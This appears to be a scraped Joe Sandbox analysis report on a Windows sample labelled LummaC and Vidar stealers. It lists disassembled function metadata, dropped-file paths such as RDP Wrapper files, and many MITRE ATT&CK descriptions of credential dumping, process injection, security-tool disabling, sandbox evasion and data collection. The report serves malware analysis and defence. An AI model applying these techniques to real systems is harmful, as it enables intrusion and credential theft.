Function 6CA90DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6CA90DF5
TlsGetValue.KERNEL32 ref: 6CA90E2D
TlsGetValue.KERNEL32 ref: 6CA90E58
TlsGetValue.KERNEL32 ref: 6CA90E84

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: ef736cd16073bbfb3a5efa0c5dceeaf23fadd893dee508a680c538f8030eef34
Instruction ID: b734914f2b9ca25f24d3d07d2c22615779636acc6c01d54ad167040e71a9aff7
Opcode Fuzzy Hash: ef736cd16073bbfb3a5efa0c5dceeaf23fadd893dee508a680c538f8030eef34
Instruction Fuzzy Hash: A031B4B1A65794CFDB006F3CC58665977F8FF0E388F094669D89887A11EB3484C5CB82

Function 6CA41EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6CA41ECE
free.MOZGLUE(?), ref: 6CA41EDF
free.MOZGLUE(?), ref: 6CA41EEF
free.MOZGLUE(?), ref: 6CA41EF5

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: bf47ee206eaf101851e0ec02f196cd22013b6d991b94c0eee39f59ac81e95a07
Instruction ID: a8735d571f2a855700abde3846486f661d78660be3c63aa53113a927572f15ec
Opcode Fuzzy Hash: bf47ee206eaf101851e0ec02f196cd22013b6d991b94c0eee39f59ac81e95a07
Instruction Fuzzy Hash: 69F0B4B57012016BEB009B65EC85D37737CEF46694B084425ED19C3A00D739F46586A1

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\RDP Wrapper\rdpwrap.dll

C:\Program Files\RDP Wrapper\rdpwrap.ini

C:\ProgramData\BAFCGIJDAFBK\FHDAEH

C:\ProgramData\BAFCGIJDAFBK\KKFHJD

C:\ProgramData\BAFCGIJDAFBK\KKJKEB

C:\ProgramData\BKKFCFBKFC.exe

C:\ProgramData\CFHIIEHJKK.exe

Windows Analysis Report
file.exe

**\Device\Mup\116938*\MAILSLOT\NET\NETLOGON**

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre